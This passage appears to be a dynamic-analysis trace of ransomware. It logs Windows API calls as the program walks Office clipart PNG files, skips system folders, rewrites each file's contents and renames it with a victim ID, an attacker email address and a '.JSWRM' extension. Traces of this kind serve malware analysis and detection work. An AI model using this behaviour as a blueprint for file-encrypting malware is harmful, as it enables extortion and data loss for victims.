dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0400001.PNG", cAlternateFileName="")) returned 1 [0091.118] lstrcmpiW (lpString1="J0400001.PNG", lpString2=".") returned 1 [0091.118] lstrcmpiW (lpString1="J0400001.PNG", lpString2="..") returned 1 [0091.118] lstrcmpiW (lpString1="J0400001.PNG", lpString2="...") returned 1 [0091.118] lstrcmpiW (lpString1="J0400001.PNG", lpString2="windows") returned -1 [0091.118] lstrcmpiW (lpString1="J0400001.PNG", lpString2="recovery") returned -1 [0091.118] lstrcmpiW (lpString1="J0400001.PNG", lpString2="perflogs") returned -1 [0091.118] lstrcmpiW (lpString1="J0400001.PNG", lpString2="documents and settings") returned 1 [0091.118] lstrcmpiW (lpString1="J0400001.PNG", lpString2="$RECYCLE.BIN") returned 1 [0091.119] lstrcmpiW (lpString1="J0400001.PNG", lpString2="system volume information") returned -1 [0091.119] lstrcmpiW (lpString1="J0400001.PNG", lpString2="msocache") returned -1 [0091.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0091.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400001.PNG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400001.PNG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0400001.PNG", lpUsedDefaultChar=0x0) returned 12 [0091.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0091.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0091.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400001.PNG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400001.PNG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0400001.PNG", lpUsedDefaultChar=0x0) returned 12 [0091.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0091.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0091.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0091.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0091.119] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400001.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400001.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.120] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=202883) returned 1 [0091.120] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0091.120] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0091.133] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.133] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0091.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.133] CloseHandle (hObject=0x314) returned 1 [0091.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0091.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0091.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0091.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0091.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0091.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0091.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.134] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400001.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400001.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400001.PNG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400001.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0091.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0091.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0091.135] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5380be, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5380be, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5380be, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15d49, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0400002.PNG", cAlternateFileName="")) returned 1 [0091.135] lstrcmpiW (lpString1="J0400002.PNG", lpString2=".") returned 1 [0091.135] lstrcmpiW (lpString1="J0400002.PNG", lpString2="..") returned 1 [0091.135] lstrcmpiW (lpString1="J0400002.PNG", lpString2="...") returned 1 [0091.135] lstrcmpiW (lpString1="J0400002.PNG", lpString2="windows") returned -1 [0091.135] lstrcmpiW (lpString1="J0400002.PNG", lpString2="recovery") returned -1 [0091.135] lstrcmpiW (lpString1="J0400002.PNG", lpString2="perflogs") returned -1 [0091.135] lstrcmpiW (lpString1="J0400002.PNG", lpString2="documents and settings") returned 1 [0091.135] lstrcmpiW (lpString1="J0400002.PNG", lpString2="$RECYCLE.BIN") returned 1 [0091.135] lstrcmpiW (lpString1="J0400002.PNG", lpString2="system volume information") returned -1 [0091.135] lstrcmpiW (lpString1="J0400002.PNG", lpString2="msocache") returned -1 [0091.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0091.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400002.PNG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400002.PNG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0400002.PNG", lpUsedDefaultChar=0x0) returned 12 [0091.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0091.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0091.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400002.PNG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400002.PNG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0400002.PNG", lpUsedDefaultChar=0x0) returned 12 [0091.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0091.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0091.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0091.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0091.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400002.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400002.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.136] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=89417) returned 1 [0091.136] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15d40) returned 0x24d210 [0091.136] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x15d40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x15d40, lpOverlapped=0x0) returned 1 [0091.143] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.143] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x15d40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x15d40, lpOverlapped=0x0) returned 1 [0091.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.145] CloseHandle (hObject=0x314) returned 1 [0091.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0091.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0091.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0091.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0091.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0091.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0091.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0091.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0091.145] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400002.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400002.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400002.PNG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400002.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0091.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0091.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0091.146] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5380be, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5380be, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5380be, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e836, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0400003.PNG", cAlternateFileName="")) returned 1 [0091.146] lstrcmpiW (lpString1="J0400003.PNG", lpString2=".") returned 1 [0091.146] lstrcmpiW (lpString1="J0400003.PNG", lpString2="..") returned 1 [0091.146] lstrcmpiW (lpString1="J0400003.PNG", lpString2="...") returned 1 [0091.146] lstrcmpiW (lpString1="J0400003.PNG", lpString2="windows") returned -1 [0091.146] lstrcmpiW (lpString1="J0400003.PNG", lpString2="recovery") returned -1 [0091.146] lstrcmpiW (lpString1="J0400003.PNG", lpString2="perflogs") returned -1 [0091.146] lstrcmpiW (lpString1="J0400003.PNG", lpString2="documents and settings") returned 1 [0091.146] lstrcmpiW (lpString1="J0400003.PNG", lpString2="$RECYCLE.BIN") returned 1 [0091.146] lstrcmpiW (lpString1="J0400003.PNG", lpString2="system volume information") returned -1 [0091.146] lstrcmpiW (lpString1="J0400003.PNG", lpString2="msocache") returned -1 [0091.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0091.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400003.PNG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400003.PNG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0400003.PNG", lpUsedDefaultChar=0x0) returned 12 [0091.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0091.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0091.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400003.PNG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400003.PNG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0400003.PNG", lpUsedDefaultChar=0x0) returned 12 [0091.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0091.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0091.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0091.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0091.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400003.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400003.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.150] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=124982) returned 1 [0091.150] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e830) returned 0x24d210 [0091.151] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1e830, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x1e830, lpOverlapped=0x0) returned 1 [0091.166] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.166] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1e830, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x1e830, lpOverlapped=0x0) returned 1 [0091.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.168] CloseHandle (hObject=0x314) returned 1 [0091.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0091.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0091.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0091.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0091.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0091.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0091.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0091.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0091.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.168] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400003.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400003.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400003.PNG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400003.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0091.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0091.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0091.169] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf511e53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf511e53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf511e53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19a5d, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0400004.PNG", cAlternateFileName="")) returned 1 [0091.169] lstrcmpiW (lpString1="J0400004.PNG", lpString2=".") returned 1 [0091.169] lstrcmpiW (lpString1="J0400004.PNG", lpString2="..") returned 1 [0091.169] lstrcmpiW (lpString1="J0400004.PNG", lpString2="...") returned 1 [0091.169] lstrcmpiW (lpString1="J0400004.PNG", lpString2="windows") returned -1 [0091.169] lstrcmpiW (lpString1="J0400004.PNG", lpString2="recovery") returned -1 [0091.169] lstrcmpiW (lpString1="J0400004.PNG", lpString2="perflogs") returned -1 [0091.170] lstrcmpiW (lpString1="J0400004.PNG", lpString2="documents and settings") returned 1 [0091.170] lstrcmpiW (lpString1="J0400004.PNG", lpString2="$RECYCLE.BIN") returned 1 [0091.170] lstrcmpiW (lpString1="J0400004.PNG", lpString2="system volume information") returned -1 [0091.170] lstrcmpiW (lpString1="J0400004.PNG", lpString2="msocache") returned -1 [0091.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0091.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400004.PNG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400004.PNG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0400004.PNG", lpUsedDefaultChar=0x0) returned 12 [0091.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0091.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0091.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400004.PNG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0400004.PNG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0400004.PNG", 